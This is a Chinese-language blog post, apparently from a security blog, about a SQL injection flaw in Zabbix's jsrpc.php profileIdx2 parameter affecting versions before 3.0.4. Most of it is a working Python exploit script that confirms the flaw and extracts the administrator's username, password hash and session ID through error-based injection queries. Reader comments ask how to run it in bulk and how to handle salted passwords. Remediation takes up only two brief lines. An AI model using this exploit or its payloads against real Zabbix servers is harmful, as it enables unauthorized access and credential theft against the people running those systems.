正在阅读:

zabbix最新SQL注入漏洞+EXP

13,556

最近zabbix又出大事了,高危的SQL注入漏洞,影响V3.0.4以下所有版本,请小伙伴及时修复。

漏洞概述:

zabbix是一个开源的企业级性能监控解决方案。

官方网站:http://www.zabbix.com

zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。

zabbix_sql

影响程度:

攻击成本:低

危害程度:高

是否登陆:不需要

影响范围:2.2.x, 3.0.0-3.0.3。(其他版本未经测试)

漏洞测试

在您的zabbix的地址后面加上如下url:

jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1

返回页面出现"You have an error in your SQL syntax" 则证明存在SQL注入漏洞。

漏洞EXP:

#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf-8 -*-
# Date: 2016/8/18
# Created by 独自等待
# 博客 http://www.waitalone.cn/
import urllib2
import sys, os
import re


def deteck_Sql():
    u'检查是否存在SQL注入'
    payload = "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
    try:
        response = urllib2.urlopen(url + payload, timeout=10).read()
    except Exception, msg:
        print msg
    else:
        key_reg = re.compile(r"INSERT\s*INTO\s*profiles")
        if key_reg.findall(response):
            return True


def sql_Inject(sql):
    u'获取特定sql语句内容'
    payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(
        sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
    try:
        response = urllib2.urlopen(payload, timeout=10).read()
    except Exception, msg:
        print msg
    else:
        result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")
        results = result_reg.findall(response)
        if results:
            return results[0]


if __name__ == '__main__':
    # os.system(['clear', 'cls'][os.name == 'nt'])
    print '+' + '-' * 60 + '+'
    print '\t   Python Zabbix<3.0.4 SQL注入 Exploit'
    print '\t    Blog:http://www.waitalone.cn/'
    print '\t\t   Code BY: 独自等待'
    print '\t\t   Time:2016-08-18'
    print '+' + '-' * 60 + '+'
    if len(sys.argv) != 2:
        print '用法: ' + os.path.basename(sys.argv[0]) + ' Zabbix 网站地址'
        print '实例: ' + os.path.basename(sys.argv[0]) + ' http://www.waitalone.cn/'
        sys.exit()
    url = sys.argv[1]
    if url[-1] != '/': url += '/'
    passwd_sql = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from  users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    session_sql = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select sessionid from sessions limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    if deteck_Sql():
        print u'Zabbix 存在SQL注入漏洞!\n'
        print u'管理员  用户名密码:%s' % sql_Inject(passwd_sql)
        print u'管理员  Session_id:%s' % sql_Inject(session_sql)
    else:
        print u'Zabbix 不存在SQL注入漏洞!\n'

zabbix_sql

漏洞修复:

1、禁用后台用户guest账号(注入要求此账号启用)。

2、升级到zabbix的最新版

文章来源:http://www.secpulse.com/archives/51168.html 略有改动,增加exp

目前有:7条访客评论,博主回复5

  1. 0h1in9e
    2016-08-18 15:53

    666啊

  2. xxxx
    2016-08-19 10:23

    怎么搞成批量的?

  3. cs123
    2016-08-22 13:49

    为什么注入出来的密码md5解了以后都登陆不上去呢?

    • 独自等待
      2016-08-22 14:44

      哦,有可能有salt字段,exp中sql语句里面修改一下就行了。

    • 路人
      2016-09-12 21:17

      @cs123:网站打开有点慢 博主

    • 独自等待
      2016-08-30 14:02

      对于这种人,我也是没有办法,我转载文章都会有来源地址的。兄弟们尽量从我博客上面下载exp吧,有的会不定时修改,他们转载的不一定是最新的。

  4. qiutian
    2016-09-27 19:51

    File “zabbixsql.py”, line 5
    SyntaxError: ‘gbk’ codec can’t decode bytes in position 15-16: illegal multibyte sequence

    求解决方法

  5. 运维小二
    2016-11-19 17:28

    CMDB机柜平台结合zabbix告警展示:
    http://www.roncoo.com/article/detail/125457

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌